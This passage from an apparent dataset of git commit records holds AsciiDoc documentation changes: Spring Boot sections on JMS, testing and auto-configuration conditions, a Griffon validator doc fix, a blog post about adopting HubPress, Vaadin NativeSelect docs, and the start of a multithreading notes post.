For example, you might declare the following section in\n`application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.activemq.broker-url=tcp:\/\/192.168.1.210:9876\n\tspring.activemq.user=admin\n\tspring.activemq.password=secret\n----\n\nSee {sc-spring-boot-autoconfigure}\/jms\/activemq\/ActiveMQProperties.{sc-ext}[`ActiveMQProperties`]\nfor more of the supported options.\n\nBy default, ActiveMQ creates a destination if it does not exist yet, so destinations are\nresolved against their provided names.\n\n\n\n[[boot-features-using-jms-template]]\n==== Using JmsTemplate\nSpring's `JmsTemplate` is auto-configured and you can `@Autowire` it directly into your\nown beans:\n\n[source,java,indent=0]\n----\n\timport org.springframework.beans.factory.annotation.Autowired;\n\timport org.springframework.jms.core.JmsTemplate;\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate final JmsTemplate jmsTemplate;\n\n\t\t@Autowired\n\t\tpublic MyBean(JmsTemplate jmsTemplate) {\n\t\t\tthis.jmsTemplate = jmsTemplate;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----
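\n\nSending a message is then a one-liner (a sketch; the `myQueue` destination name is\nillustrative):\n\n[source,java,indent=0]\n----\n\t\/\/ inside MyBean, using the injected JmsTemplate\n\tthis.jmsTemplate.convertAndSend(\"myQueue\", \"Hello from Spring Boot\");\n----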
\n\n\n\n[[boot-features-integration]]\n== Spring Integration\nSpring Integration provides abstractions over messaging and also other transports such as\nHTTP, TCP etc. If Spring Integration is available on your classpath it will be initialized\nthrough the `@EnableIntegration` annotation. Message processing statistics will be\npublished over JMX if ``spring-integration-jmx'' is also on the classpath.\nSee the {sc-spring-boot-autoconfigure}\/integration\/IntegrationAutoConfiguration.{sc-ext}[`IntegrationAutoConfiguration`]\nclass for more details.\n\n\n\n[[boot-features-jmx]]\n== Monitoring and management over JMX\nJava Management Extensions (JMX) provide a standard mechanism to monitor and manage\napplications. By default Spring Boot will create an `MBeanServer` with bean id\n``mbeanServer'' and expose any of your beans that are annotated with Spring JMX\nannotations (`@ManagedResource`, `@ManagedAttribute`, `@ManagedOperation`).\n\nSee the {sc-spring-boot-autoconfigure}\/jmx\/JmxAutoConfiguration.{sc-ext}[`JmxAutoConfiguration`]\nclass for more details.\n\n\n\n[[boot-features-testing]]\n== Testing\nSpring Boot provides a number of useful tools for testing your application. The\n`spring-boot-starter-test` POM provides Spring Test, JUnit, Hamcrest and Mockito\ndependencies. There are also useful test utilities in the core `spring-boot` module\nunder the `org.springframework.boot.test` package.\n\n\n\n[[boot-features-test-scope-dependencies]]\n=== Test scope dependencies\nIf you use the\n`spring-boot-starter-test` ``Starter POM'' (in the `test` `scope`), you will find\nthe following provided libraries:\n\n* Spring Test -- Integration test support for Spring applications.\n* JUnit -- The de-facto standard for unit testing Java applications.\n* Hamcrest -- A library of matcher objects (also known as constraints or predicates)\n allowing `assertThat` style JUnit assertions.\n* Mockito -- A Java mocking framework.\n\nThese are common libraries that we generally find useful when writing tests. You are free\nto add additional test dependencies of your own if these don't suit your needs.\n\n\n[[boot-features-testing-spring-applications]]\n=== Testing Spring applications\nOne of the major advantages of dependency injection is that it should make your code\neasier to unit test. You can simply instantiate objects using the `new` operator without\neven involving Spring. You can also use _mock objects_ instead of real dependencies.\n\nOften you need to move beyond ``unit testing'' and start ``integration testing'' (with\na Spring `ApplicationContext` actually involved in the process). It's useful to be able\nto perform integration testing without requiring deployment of your application or\nneeding to connect to other infrastructure.\n\nThe Spring Framework includes a dedicated test module for just such integration testing.\nYou can declare a dependency directly to `org.springframework:spring-test` or use the\n`spring-boot-starter-test` ``Starter POM'' to pull it in transitively.\n\nIf you have not used the `spring-test` module before you should start by reading the\n{spring-reference}\/#testing[relevant section] of the Spring Framework reference\ndocumentation.\n\n\n\n[[boot-features-testing-spring-boot-applications]]\n=== Testing Spring Boot applications\nA Spring Boot application is just a Spring `ApplicationContext` so nothing very special\nhas to be done to test it beyond what you would normally do with a vanilla Spring context.\nOne thing to watch out for though is that the external properties, logging and other\nfeatures of Spring Boot are only installed in the context by default if you use\n`SpringApplication` to create it.\n\nSpring Boot provides a `@SpringApplicationConfiguration` annotation as an alternative\nto the standard `spring-test` `@ContextConfiguration` annotation. If you use\n`@SpringApplicationConfiguration` to configure the `ApplicationContext` used in your\ntests, it will be created via `SpringApplication` and you will get the additional Spring\nBoot features.\n\nFor example:\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RunWith(SpringJUnit4ClassRunner.class)\n\t@SpringApplicationConfiguration(classes = SampleDataJpaApplication.class)\n\tpublic class CityRepositoryIntegrationTests {\n\n\t\t@Autowired\n\t\tCityRepository repository;\n\n\t\t\/\/ ...\n\n\t}\n----\n\nTIP: The context loader guesses whether you want to test a web application or not (e.g.\nwith `MockMVC`) by looking for the `@WebAppConfiguration` annotation. (`MockMVC` and\n`@WebAppConfiguration` are part of `spring-test`).\n\nIf you want a web application to start up and listen on its normal port, so you can test\nit with HTTP (e.g. using `RestTemplate`), annotate your test class (or one of its\nsuperclasses) with `@IntegrationTest`. This can be very useful because it means you can\ntest the full stack of your application, but also inject its components into the test\nclass and use them to assert the internal state of the application after an HTTP\ninteraction. For example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RunWith(SpringJUnit4ClassRunner.class)\n\t@SpringApplicationConfiguration(classes = SampleDataJpaApplication.class)\n\t@WebAppConfiguration\n\t@IntegrationTest\n\tpublic class CityRepositoryIntegrationTests {\n\n\t\t@Autowired\n\t\tCityRepository repository;\n\n\t\tRestTemplate restTemplate = new TestRestTemplate();\n\n\t\t\/\/ ... interact with the running server\n\n\t}\n----\n\nNOTE: Spring's test framework will cache application contexts between tests. Therefore,\nas long as your tests share the same configuration, the time consuming process of starting\nand stopping the server will only happen once, regardless of the number of tests that\nactually run.\n\nTo change the port you can add environment properties to `@IntegrationTest` as colon- or\nequals-separated name-value pairs, e.g. 
`@IntegrationTest(\"server.port:9000\")`.\nAdditionally you can set the `server.port` and `management.port` properties to `0`\nin order to run your integration tests using random ports. For example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RunWith(SpringJUnit4ClassRunner.class)\n\t@SpringApplicationConfiguration(classes = MyApplication.class)\n\t@WebAppConfiguration\n\t@IntegrationTest({\"server.port=0\", \"management.port=0\"})\n\tpublic class SomeIntegrationTests {\n\n\t\t\/\/ ...\n\n\t}\n----\n\nSee <<howto-discover-the-http-port-at-runtime>> for a description of how you can discover\nthe actual port that was allocated for the duration of the tests.\n\n\n\n[[boot-features-testing-spring-boot-applications-with-spock]]\n==== Using Spock to test Spring Boot applications\nIf you wish to use Spock to test a Spring Boot application you should add a dependency\non Spock's `spock-spring` module to your application's build. `spock-spring` integrates\nSpring's test framework into Spock.\n\nPlease note that you cannot use the `@SpringApplicationConfiguration` annotation that was\n<<boot-features-testing-spring-boot-applications,described above>> as Spock\nhttps:\/\/code.google.com\/p\/spock\/issues\/detail?id=349[does not find the\n`@ContextConfiguration` meta-annotation]. To work around this limitation, you should use\nthe `@ContextConfiguration` annotation directly and configure it to use the Spring\nBoot specific context loader:\n\n[source,groovy,indent=0]\n----\n\t@ContextConfiguration(loader = SpringApplicationContextLoader.class)\n\tclass ExampleSpec extends Specification {\n\n\t\t\/\/ ...\n\n\t}\n----\n\n\n\n[[boot-features-test-utilities]]\n=== Test utilities\nA few test utility classes are packaged as part of `spring-boot` that are generally\nuseful when testing your application.\n\n\n\n[[boot-features-configfileapplicationcontextinitializer-test-utility]]\n==== ConfigFileApplicationContextInitializer\n`ConfigFileApplicationContextInitializer` is an `ApplicationContextInitializer` that\ncan apply to your tests to load Spring Boot `application.properties` files. You can use\nthis when you don't need the full features provided by `@SpringApplicationConfiguration`.\n\n[source,java,indent=0]\n----\n\t@ContextConfiguration(classes = Config.class,\n\t\tinitializers = ConfigFileApplicationContextInitializer.class)\n----\n\n\n\n[[boot-features-environment-test-utilities]]\n==== EnvironmentTestUtils\n`EnvironmentTestUtils` allows you to quickly add properties to a\n`ConfigurableEnvironment` or `ConfigurableApplicationContext`. Simply call it with\n`key=value` strings:\n\n[source,java,indent=0]\n----\nEnvironmentTestUtils.addEnvironment(env, \"org=Spring\", \"name=Boot\");\n----\n\n\n\n[[boot-features-output-capture-test-utility]]\n==== OutputCapture\n`OutputCapture` is a JUnit `Rule` that you can use to capture `System.out` and\n`System.err` output. 
Simply declare the capture as a `@Rule` then use `toString()`\nfor assertions:\n\n[source,java,indent=0]\n----\nimport org.junit.Rule;\nimport org.junit.Test;\nimport org.springframework.boot.test.OutputCapture;\n\nimport static org.hamcrest.Matchers.*;\nimport static org.junit.Assert.*;\n\npublic class MyTest {\n\n\t@Rule\n\tpublic OutputCapture capture = new OutputCapture();\n\n\t@Test\n\tpublic void testName() throws Exception {\n\t\tSystem.out.println(\"Hello World!\");\n\t\tassertThat(capture.toString(), containsString(\"World\"));\n\t}\n\n}\n----\n\n[[boot-features-rest-templates-test-utility]]\n==== TestRestTemplate\n\n`TestRestTemplate` is a convenience subclass of Spring's `RestTemplate` that is\nuseful in integration tests. You can get a vanilla template or one that sends Basic HTTP\nauthentication (with a username and password). In either case the template will behave\nin a test-friendly way: not following redirects (so you can assert the response\nlocation), ignoring cookies (so the template is stateless), and not throwing exceptions\non server-side errors. It is recommended, but not mandatory, to use Apache HTTP Client\n(version 4.3.2 or better), and if you have that on your classpath the `TestRestTemplate`\nwill respond by configuring the client appropriately.\n\n[source,java,indent=0]\n----\npublic class MyTest {\n\n\tRestTemplate template = new TestRestTemplate();\n\n\t@Test\n\tpublic void testRequest() throws Exception {\n\t\tHttpHeaders headers = template.getForEntity(\"http:\/\/myhost.com\", String.class).getHeaders();\n\t\tassertThat(headers.getLocation().toString(), containsString(\"myotherhost\"));\n\t}\n\n}\n----\n\n\n\n[[boot-features-developing-auto-configuration]]\n== Developing auto-configuration and using conditions\nIf you work in a company that develops shared libraries, or if you work on an open-source\nor commercial library, you might want to develop your own auto-configuration.\nAuto-configuration classes can be bundled in external jars and still be picked-up by\nSpring Boot.\n\n\n\n[[boot-features-understanding-auto-configured-beans]]\n=== Understanding auto-configured beans\nUnder the hood, auto-configuration is implemented with standard `@Configuration` classes.\nAdditional `@Conditional` annotations are used to constrain when the auto-configuration\nshould apply. Usually auto-configuration classes use `@ConditionalOnClass` and\n`@ConditionalOnMissingBean` annotations. This ensures that auto-configuration only\napplies when relevant classes are found and when you have not declared your own\n`@Configuration`.\n\nYou can browse the source code of `spring-boot-autoconfigure` to see the `@Configuration`\nclasses that we provide (see the `META-INF\/spring.factories` file).\n\n\n\n[[boot-features-locating-auto-configuration-candidates]]\n=== Locating auto-configuration candidates\nSpring Boot checks for the presence of a `META-INF\/spring.factories` file within your\npublished jar. The file should list your configuration classes under the\n`EnableAutoConfiguration` key.\n\n[indent=0]\n----\n\torg.springframework.boot.autoconfigure.EnableAutoConfiguration=\\\n\tcom.mycorp.libx.autoconfigure.LibXAutoConfiguration,\\\n\tcom.mycorp.libx.autoconfigure.LibXWebAutoConfiguration\n----\n\nYou can use the\n{sc-spring-boot-autoconfigure}\/AutoConfigureAfter.{sc-ext}[`@AutoConfigureAfter`] or\n{sc-spring-boot-autoconfigure}\/AutoConfigureBefore.{sc-ext}[`@AutoConfigureBefore`]\nannotations if your configuration needs to be applied in a specific order. 
For example,\nif you provide web specific configuration, your class may need to be applied after\n`WebMvcAutoConfiguration`.\n\n\n\n[[boot-features-condition-annotations]]\n=== Condition annotations\nYou almost always want to include one or more `@Conditional` annotations on your\nauto-configuration class. The `@ConditionalOnMissingBean` is one common example that is\nused to allow developers to ``override'' auto-configuration if they are not happy with\nyour defaults.\n\nSpring Boot includes a number of `@Conditional` annotations that you can reuse in your own\ncode by annotating `@Configuration` classes or individual `@Bean` methods.\n\n\n\n[[boot-features-class-conditions]]\n==== Class conditions\nThe `@ConditionalOnClass` and `@ConditionalOnMissingClass` annotations allow configuration\nto be skipped based on the presence or absence of specific classes. Due to the fact that\nannotation meta-data is parsed using http:\/\/asm.ow2.org\/[ASM] you can actually use the\n`value` attribute to refer to the real class, even though that class might not actually\nappear on the running application classpath. You can also use the `name` attribute if you\nprefer to specify the class name using a `String` value.\n\n\n\n[[boot-features-bean-conditions]]\n==== Bean conditions\nThe `@ConditionalOnBean` and `@ConditionalOnMissingBean` annotations allow configurations\nto be skipped based on the presence or absence of specific beans. You can use the `value`\nattribute to specify beans by type, or `name` to specify beans by name. The `search`\nattribute allows you to limit the `ApplicationContext` hierarchy that should be considered\nwhen searching for beans.\n\nNOTE: `@Conditional` annotations are processed when `@Configuration` classes are\nparsed. Auto-configure `@Configuration` is always parsed last (after any user defined\nbeans), however, if you are using these annotations on regular `@Configuration` classes,\ncare must be taken not to refer to bean definitions that have not yet been created.\n\n\n\n[[boot-features-resource-conditions]]\n==== Resource conditions\nThe `@ConditionalOnResource` annotation allows configuration to be included only when a\nspecific resource is present. Resources can be specified using the usual Spring\nconventions, for example, `file:\/home\/user\/test.dat`.\n\n\n\n[[boot-features-web-application-conditions]]\n==== Web Application Conditions\nThe `@ConditionalOnWebApplication` and `@ConditionalOnNotWebApplication` annotations\nallow configuration to be skipped depending on whether the application is a\n'web application'. A web application is any application that is using a Spring\n`WebApplicationContext`, defines a `session` scope or has a `StandardServletEnvironment`.\n\n\n\n[[boot-features-spel-conditions]]\n==== SpEL expression conditions\nThe `@ConditionalOnExpression` annotation allows configuration to be skipped based on the\nresult of a {spring-reference}\/#expressions[SpEL expression].
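\n\nPutting the class and bean conditions above together, a typical auto-configuration\nclass looks something like the following sketch (`LibXClient` and `LibXService` are\nillustrative names matching the earlier `spring.factories` example, not real classes):\n\n[source,java,indent=0]\n----\n\t@Configuration\n\t@ConditionalOnClass(LibXClient.class)\n\tpublic class LibXAutoConfiguration {\n\n\t\t\/\/ only created if the user has not declared their own LibXService bean\n\t\t@Bean\n\t\t@ConditionalOnMissingBean\n\t\tpublic LibXService libXService() {\n\t\t\treturn new LibXService();\n\t\t}\n\n\t}\n----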
NOTE: `@Conditional` annotations are processed when `@Configuration` classes are\nparsed. Auto-configure `@Configuration` is always parsed last (after any user defined\nbeans); however, if you are using these annotations on regular `@Configuration` classes,\ncare must be taken not to refer to bean definitions that have not yet been created.\n\n\n\n[[boot-features-resource-conditions]]\n==== Resource conditions\nThe `@ConditionalOnResource` annotation allows configuration to be included only when a\nspecific resource is present. Resources can be specified using the usual Spring\nconventions, for example, `file:\/home\/user\/test.dat`.\n\n\n\n[[boot-features-web-application-conditions]]\n==== Web Application Conditions\nThe `@ConditionalOnWebApplication` and `@ConditionalOnNotWebApplication` annotations\nallow configuration to be skipped depending on whether the application is a\n'web application'. A web application is any application that is using a Spring\n`WebApplicationContext`, defines a `session` scope or has a `StandardServletEnvironment`.\n\n\n\n[[boot-features-spel-conditions]]\n==== SpEL expression conditions\nThe `@ConditionalOnExpression` annotation allows configuration to be skipped based on the\nresult of a {spring-reference}\/#expressions[SpEL expression].\n\n\n\n[[boot-features-whats-next]]\n== What to read next\nIf you want to learn more about any of the classes discussed in this section, you can\ncheck out the {dc-root}[Spring Boot API documentation] or you can browse the\n{github-code}[source code directly]. If you have specific questions, take a look at the\n<<howto.adoc#howto, how-to>> section.\n\nIf you are comfortable with Spring Boot's core features, you can carry on and read\nabout <<production-ready-features.adoc#production-ready, production-ready features>>.\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e600196150390b5c72f4935c692f10ec55e797bd","subject":"Fix #1","message":"Fix #1\n","repos":"griffon-plugins\/griffon-validation-plugin","old_file":"subprojects\/griffon-validation-guide\/src\/asciidoc\/validator.adoc","new_file":"subprojects\/griffon-validation-guide\/src\/asciidoc\/validator.adoc","new_contents":"\n[[_constraints_validator]]\n= Validator\n\n.Purpose\nAdds custom validation to a field.\n\n[source,java,options=\"nowrap\"]\n.Java\n----\n.e(\"even\", list(validator( (Number v) -> v.intValue() % 2 == 0 ? \"\" : \"validator.invalid\" )))\n.e(\"password2\", list(validator( (String v, Bean b) -> areEqual(b.password, v) ? \"\" : \"passwords.do.not.match\" )))\n----\n\n[source,groovy,options=\"nowrap\"]\n.Groovy\n----\neven(validator: { val -> val % 2 == 0 ? '' : 'validator.invalid' })\npassword2(validator: { v, obj -> obj.password == v ? '' : 'passwords.do.not.match' })\n----\n\n.Description\n\nA custom validator is implemented by a Closure that takes up to two parameters. If the Closure accepts zero or\none parameter, the parameter value will be the one being validated (\"it\" in the case of a zero-parameter Closure).\nIf it accepts two parameters, the first is the value and the second is the class instance being validated.\nThis is useful when your validation needs access to other fields, for example when checking that two entered\npasswords are the same.\n\nThe closure can return:\n\n * null or empty String to indicate that the value is valid.\n * a String to indicate the error code to append to the \"classname.propertyName.\" String used to resolve the\n error message. If a field-specific message cannot be resolved, the error code itself will be resolved allowing\n for global error messages.\n\n.Messages\nFor property validator\n[horizontal]\nError Codes:: `className.propertyName.validator.invalid`, `default.invalid.property.validator.message`\nTemplate:: Property [{0}] of class [{1}] with value [{2}] is invalid\n\nFor Object validator\n[horizontal]\nError Codes:: `className.propertyName.validator.invalid`, `default.invalid.object.validator.message`\nTemplate:: Property [{0}] of class [{1}] with value [{2}] is invalid\n\n","old_contents":"\n[[_constraints_validator]]\n= Validator\n\n.Purpose\nAdds custom validation to a field.\n\n[source,java,options=\"nowrap\"]\n.Java\n----\n.e(\"even\", list(validator( (Number v) -> {val % 2 ? \"\" : \"validator.invalid\"}\u00a0)))\n.e(\"password2\", list(validator( (Number v, Bean b) -> areEqual(b.password, val) ? \"\" : \"passwords.do.not.match\" )))\n----\n\n[source,groovy,options=\"nowrap\"]\n.Groovy\n----\neven(validator{ val -> val % 2 ? '' : 'validator.invalid' })\npassword2(validator{ v, obj -> obj.password == val ? '' : 'passwords.do.not.match' })\n----\n\n.Description\n\nA custom validator is implemented by a Closure that takes up to two parameters. 
If the Closure accepts zero or\none parameter, the parameter value will be the one being validated (\"it\" in the case of a zero-parameter Closure).\nIf it accepts two parameters the first is the value and the second is the class instance being validated.\nThis is useful when your validation needs access to other fields, for example when checking that two entered\npasswords are the same.\n\nThe closure can return:\n\n * null or empty String to indicate that the value is valid.\n * a String to indicate the error code to append to the \"classname.propertyName.\" String used to resolve the\n error message. If a field-specific message cannot be resolved, the error code itself will be resolved allowing\n for global error messages.\n\n.Messages\nFor property validator\n[horizontal]\nError Codes:: `className.propertyName.validator.invalid`, `default.invalid.property.validator.message`\nTemplate:: Property [{0}] of class [{1}] with value [{2}] is invalid\n\nFor Object validator\n[horizontal]\nError Codes:: `className.propertyName.validator.invalid`, `default.invalid.object.validator.message`\nTemplate:: Property [{0}] of class [{1}] with value [{2}] is invalid\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"afccf12f1ff1546859bbbeffebda27352f446ed3","subject":"Update 2017-04-30-Reboot.adoc","message":"Update 2017-04-30-Reboot.adoc","repos":"daemotron\/daemotron.github.io,daemotron\/daemotron.github.io,daemotron\/daemotron.github.io,daemotron\/daemotron.github.io","old_file":"_posts\/2017-04-30-Reboot.adoc","new_file":"_posts\/2017-04-30-Reboot.adoc","new_contents":"= Reboot \n:published_at: 2017-04-30\n:hp-tags: Blog, Open_Source,\n\n[quote]\n____\nI amar prestar aen, +\nHan mathon ne nen, +\nHan mathon ne chae +\nA han noston ned 'wilith\n____\n\nAnd again, my world is changing. A bit more than one year ago, I moved from a self-hosted blog built with https:\/\/ghost.org\/[Ghost] to a fully managed website using Jimdo's website construction kit. Sure, the effort for maintaining the full stack (server, os, database, web server software, etc.) has gone, and I certainly don't want it back.\n\nBut maintaining the website itself has proven to be a bit of a hassle with Jimdo -- each page, even each blog post, has to be bricolaged together with predefined content elements. So a lot of my time spent on the website went into laying out articles, instead of writing content. Unlike with Ghost, you couldn't just log in and write away in simple plain text (https:\/\/en.wikipedia.org\/wiki\/Markdown[Markdown], to be precise).\n\nThis really had an impact on my posting frequency -- at some time, it was as low as just once every couple of months (my personal \"best\" was a full 5 months of silence). Not being happy with Jimdo (mostly due to that), I constantly kept looking for alternative solutions that would give me back easier content creation, but not at the cost of making me spend hours on administering servers and applications again.\n\nI tried some big CMS stuff (like https:\/\/plone.org\/[Plone 5], https:\/\/www.django-cms.org\/[django CMS], http:\/\/www.opencms.org\/[OpenCms] and http:\/\/www.ametys.org\/[Ametys]) hosted on managed cloud services, but again I didn't find the simplicity I was hoping for. Either it was very complex to set up the site itself, or blogging in general was not well supported. Or media management proved to be complex, or inserting syntax-highlighted code snippets into articles was impossible without bigger hacks... 
whichever one I chose, none of them had real simplicity and elegance in store.\n\nOver time, again and again I was drawn to static site generators. For some time, my blog was running on https:\/\/getnikola.com\/[Nikola], and back then I had good reasons to stop using it -- mostly the long run time to get my site updated after having changed something as small as a typo fix in an article, but also the fact I had to have access to a computer with the repo cloned locally and all the software dependencies installed.\n\nYet the simplicity of hosting a static site is still very attractive, so how on earth could I get a static blog without need for local software and build tools, and with the ability to generate content from any computer? I knew about https:\/\/pages.github.com\/[GitHub Pages] and https:\/\/jekyllrb.com\/[Jekyll], but I could never warm to Jekyll or derivative static site generators (I'm simply not a ruby guy...). I also experimented with http:\/\/www.sphinx-doc.org\/[Sphinx] and https:\/\/github.com\/syntaf\/travis-sphinx[travis-sphinx], but Sphinx is not really made for websites and blogging.\n\nWhen I recently stumbled across http:\/\/hubpress.io\/[HubPress], I knew I had found what I was looking for. This blogging solution is built around GitHub pages, works fine even without ever loading something to the local computer, and offers a Ghost-like browser-based post editor (using http:\/\/asciidoctor.org\/[AsciiDoc] instead of Markdown). On top, posts can be written via GitHub's built-in editor, or offline with any text editor -- they're just `.adoc` files in a GitHub pages repository or branch.\n\nAfter more than 15 years of running a personal website, I'm certainly not naive when it comes to site generators and blogging solutions. I'm not sure HubPress will become a sustainable solution, driving my site for a longer period. However, it certainly has the potential to do so, as it brings along all the ingredients I was long looking for -- I will certainly give it the chance to prove it can do this for me, and hopefully also increase my posting frequency.\n","old_contents":"= Reboot \n\/\/ :published_at: 2017-04-30\n:hp-tags: Blog, Open_Source,\n\n[quote]\n____\nI amar prestar aen, +\nHan mathon ne nen, +\nHan mathon ne chae +\nA han noston ned 'wilith\n____\n\nAnd again, my world is changing. A bit more than one year ago, I moved from a self-hosted blog built with https:\/\/ghost.org\/[Ghost] to a fully managed website using Jimdo's website construction kit. Sure, the effort for maintaining the full stack (server, os, database, web server software, etc.) has gone, and I certainly don't want it back.\n\nBut maintaining the website itself has proven to be a bit of a hassle with Jimdo -- each page, even each blog post, has to be bricolaged together with predefined content elements. So a lot of my time spent on the website went into layouting articles, instead of writing content. Other than with Ghost, you couldn't just log in and write away in simple plain text (https:\/\/en.wikipedia.org\/wiki\/Markdown[Markdown], to be precise).\n\nThis really had an impact on my posting frequency -- at some time, it was as low as just once every couple of months (my personal \"best\" was a full 5 months of silence). 
Not being happy with Jimdo (mostly due to that), I constantly kept looking for alternate solutions, that would give me back an easier content creation, but not at the cost of making me spend hours on administrating servers and applications again.\n\nI tried some big CMS stuff (like https:\/\/plone.org\/[Plone 5], https:\/\/www.django-cms.org\/[django CMS], http:\/\/www.opencms.org\/[OpenCms] and http:\/\/www.ametys.org\/[Ametys]) hosted on managed cloud services, but again I didn't find the simplicity I was hoping for. Either it was very complex to set up the site itself, or blogging in general was not well supported. Or media management proved to be complex, or inserting syntax-highlighted code snippets into articles was impossible without bigger hacks... just chose, none of them had real simplicity and elegance in store.\n\nOver time, again and again I was drawn to static site generators. For some time, my blog was running on https:\/\/getnikola.com\/[Nikola], and back then I had good reasons to stop using it -- mostly the long run time to get my site updated after having changed something small as a typo fix in an article, but also the fact I had to have access to a computer with the repo cloned locally and all the software dependencies installed.\n\nYet the simplicity of hosting a static site is still very attractive, so how on earth could I get a static blog without need for local software and build tools, and with the ability to generate content from any computer? I knew about https:\/\/pages.github.com\/[GitHub Pages] and https:\/\/jekyllrb.com\/[Jekyll], but I could never warm to Jekyll or derivated static site generators (I'm simply not a ruby guy...). I also experimented with http:\/\/www.sphinx-doc.org\/[Sphinx] and https:\/\/github.com\/syntaf\/travis-sphinx[travis-sphinx], but Sphinx is not really made for websites and blogging.\n\nWhen I recently stumbled accross http:\/\/hubpress.io\/[HubPress], I knew I had found what I was looking for. This blogging solution is built around GitHub pages, works fine even without ever loading something to the local computer, and offers a Ghost-like browser-based post editor (using http:\/\/asciidoctor.org\/[AsciiDoc] instead of Markdown). On top, posts can be written via GitHub's built-in editor, or offline with any text editor -- they're just `.adoc` files in a GitHub pages repository or branch.\n\nAfter more than 15 years of running a personal website, I'm certainly not naive when it comes to site generators and blogging solutions. I'm not sure HubPress will become a sustainable solution, driving my site for a longer period. 
However, it certainly has the potential to do so, as it brings along all the ingredients I was long looking for -- I will certainly give it the chance to prove it can do this for me, and hopefully also increase my posting frequency.\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"aea1a69139d7a6542748b3c425d75883842b02b2","subject":"Remove mention of removed API (#8701)","message":"Remove mention of removed API (#8701)\n\nDeprecated setColumns was removed in fd3617b","repos":"asashour\/framework,kironapublic\/vaadin,asashour\/framework,Darsstar\/framework,asashour\/framework,Darsstar\/framework,peterl1084\/framework,peterl1084\/framework,asashour\/framework,Darsstar\/framework,peterl1084\/framework,kironapublic\/vaadin,mstahv\/framework,kironapublic\/vaadin,kironapublic\/vaadin,mstahv\/framework,asashour\/framework,peterl1084\/framework,mstahv\/framework,mstahv\/framework,Darsstar\/framework,mstahv\/framework,peterl1084\/framework,kironapublic\/vaadin,peterl1084\/framework,mstahv\/framework,Darsstar\/framework,Darsstar\/framework","old_file":"documentation\/components\/components-nativeselect.asciidoc","new_file":"documentation\/components\/components-nativeselect.asciidoc","new_contents":"---\ntitle: NativeSelect\norder: 18\nlayout: page\n---\n\n[[components.nativeselect]]\n= NativeSelect\n\nifdef::web[]\n[.sampler]\nimage:{live-demo-image}[alt=\"Live Demo\", link=\"http:\/\/demo.vaadin.com\/sampler\/#ui\/data-input\/multiple-value\/drop-down-menu\"]\nendif::web[]\n\n[classname]#NativeSelect# is a selection component that allows selecting an item from a\ndrop-down list. It is implemented with the native selection input of web browsers, using the HTML [literal]#++<select>++# element.\n\n\n[source, java]\n----\n\/\/ Create the selection component\nNativeSelect<String> select =\n new NativeSelect<>(\"Native Selection\");\n\n\/\/ Add some items\nselect.setItems(\"Mercury\", \"Venus\", ...);\n----\n\n[[figure.components.nativeselect.basic]]\n.The [classname]#NativeSelect# Component\nimage::img\/nativeselect-basic.png[width=20%, scaledwidth=35%]\n\nCommon selection component features are described in\n<<dummy\/..\/..\/..\/framework\/components\/components-selection#components.selection,\"Selection Components\">>.\n\n== CSS Style Rules\n\n\n[source, css]\n----\n.v-select {}\n .v-select-select {}\n----\n\nThe component has a [literal]#++v-select++# overall style. The native\n[literal]#++select++# element has [literal]#++v-select-select++# style.\n","old_contents":"---\ntitle: NativeSelect\norder: 18\nlayout: page\n---\n\n[[components.nativeselect]]\n= NativeSelect\n\nifdef::web[]\n[.sampler]\nimage:{live-demo-image}[alt=\"Live Demo\", link=\"http:\/\/demo.vaadin.com\/sampler\/#ui\/data-input\/multiple-value\/drop-down-menu\"]\nendif::web[]\n\n[classname]#NativeSelect# is a selection component allows selecting an item from a\ndrop-down list. 
It is implemented with the native selection input of web browsers, using the HTML [literal]#++<select>++# element.\n\n\n[source, java]\n----\n\/\/ Create the selection component\nNativeSelect<String> select =\n new NativeSelect<>(\"Native Selection\");\n\n\/\/ Add some items\nselect.setItems(\"Mercury\", \"Venus\", ...);\n----\n\nThe [methodname]#setColumns()# allows setting the width of the list as\n\"columns\", which is a measure that depends on the browser.\n\n[[figure.components.nativeselect.basic]]\n.The [classname]#NativeSelect# Component\nimage::img\/nativeselect-basic.png[width=20%, scaledwidth=35%]\n\nCommon selection component features are described in\n<<dummy\/..\/..\/..\/framework\/components\/components-selection#components.selection,\"Selection Components\">>.\n\n== CSS Style Rules\n\n\n[source, css]\n----\n.v-select {}\n .v-select-select {}\n----\n\nThe component has a [literal]#++v-select++# overall style. The native\n[literal]#++select++# element has [literal]#++v-select-select++# style.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5c8d946c953105137bf8f800210fdc8d995ba2fd","subject":"Update 2016-02-29-multithreading.adoc","message":"Update 2016-02-29-multithreading.adoc","repos":"chbailly\/chbailly.github.io,chbailly\/chbailly.github.io,chbailly\/chbailly.github.io,chbailly\/chbailly.github.io","old_file":"_posts\/2016-02-29-multithreading.adoc","new_file":"_posts\/2016-02-29-multithreading.adoc","new_contents":"= multithreading\n\n== threads, groups\n\n[source,c++]\n----\nvoid change_count() { \/* modify a shared counter *\/ }\n\nboost::thread_group threads;\nfor (int i = 0; i < num_threads; ++i)\n threads.create_thread(&change_count);\n\nthreads.join_all();\n----\n\n== synchronization (locks)\n\n* lock guard (RAII, no need to call lock\/unlock)\n\n[source,c++]\n----\nfor (int i = 0; i < 5; ++i)\n{\n wait(1);\n boost::lock_guard<boost::mutex> lock{mutex};\n std::cout << \"Thread \" << get_id() << \": \" << i << std::endl;\n}\n----\n\n* shared_mutex (locked via shared_lock or unique_lock)\n\n\n[source,c++]\n----\nvoid write_access()\n{\n boost::unique_lock<boost::shared_mutex> lock{mutex};\n}\n \nvoid read_access()\n{\n for (int i = 0; i < 3; ++i)\n {\n boost::shared_lock<boost::shared_mutex> lock{mutex};\n std::cout << random_numbers.back() << '\\n';\n }\n}\n----\n\n== conditions\n\n[source,c++]\n----\nstd::condition_variable cv;\nstd::mutex cv_m; \/\/ This mutex is used for three purposes:\n \/\/ 1) to synchronize accesses to i\n \/\/ 2) to synchronize accesses to 